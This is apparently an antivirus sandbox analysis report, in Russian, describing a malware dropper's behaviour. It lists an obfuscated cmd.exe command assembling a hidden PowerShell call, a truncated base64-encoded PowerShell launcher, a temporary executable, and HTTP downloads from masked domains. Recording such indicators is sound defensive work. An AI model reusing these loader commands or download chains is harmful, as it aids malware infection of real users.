Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /v /c "set %zoMrjrYWm%=w^er^s&&set %wqUiuKmAI%=falYLhhOP&&set %palzSaHtE%=p^o&&set %YwttYwoaF%=JQtjaafDu&&set %qOlMVhCkR%=hel^l&&set %wTtCEjitv%=AHdNrHmMw&&!%palzSaHtE%!!%zoMrjrYWm%!!%...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\9333.exe
Удаляет следующие файлы
- %TEMP%\9333.exe
Подменяет следующие файлы
- %TEMP%\9333.exe
Сетевая активность
Подключается к
- 'ph##ep.com':80
- 've###urier.net':80
- 'or#####mpli-arcanum.de':80
- 'as###team.de':80
- 'as###team.de':443
TCP
Запросы HTTP GET
- http://ph##ep.com/TVotKk/
- http://ve###urier.net/wgehKV/
- http://www.ve###urier.net/wgehKV/
- http://or#####mpli-arcanum.de/CDsw/
- http://as###team.de/CnObVCJ/
Другие
- 'as###team.de':443
UDP
- DNS ASK ph##ep.com
- DNS ASK ve###urier.net
- DNS ASK fi##ac.de
- DNS ASK or#####mpli-arcanum.de
- DNS ASK as###team.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v /c "set %zoMrjrYWm%=w^er^s&&set %wqUiuKmAI%=falYLhhOP&&set %palzSaHtE%=p^o&&set %YwttYwoaF%=JQtjaafDu&&set %qOlMVhCkR%=hel^l&&set %wTtCEjitv%=AHdNrHmMw&&!%palzSaHtE%!!%zoMrjrYWm%!!%...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAFYAZQByAEIAbwBTAEUAUAByAGUAZgBFAHIARQBOAEMAZQAuAFQAbwBTAHQAcgBJAE4ARwAoACkAWwAxACwAMwBdACsAJwBYACcALQBqAE8AaQBOACcAJwApACAAKAAgACIAJAAoACAAcwBFAHQALQBWAEEAcgBpAEEAYgBsAGUAIAAnAE...
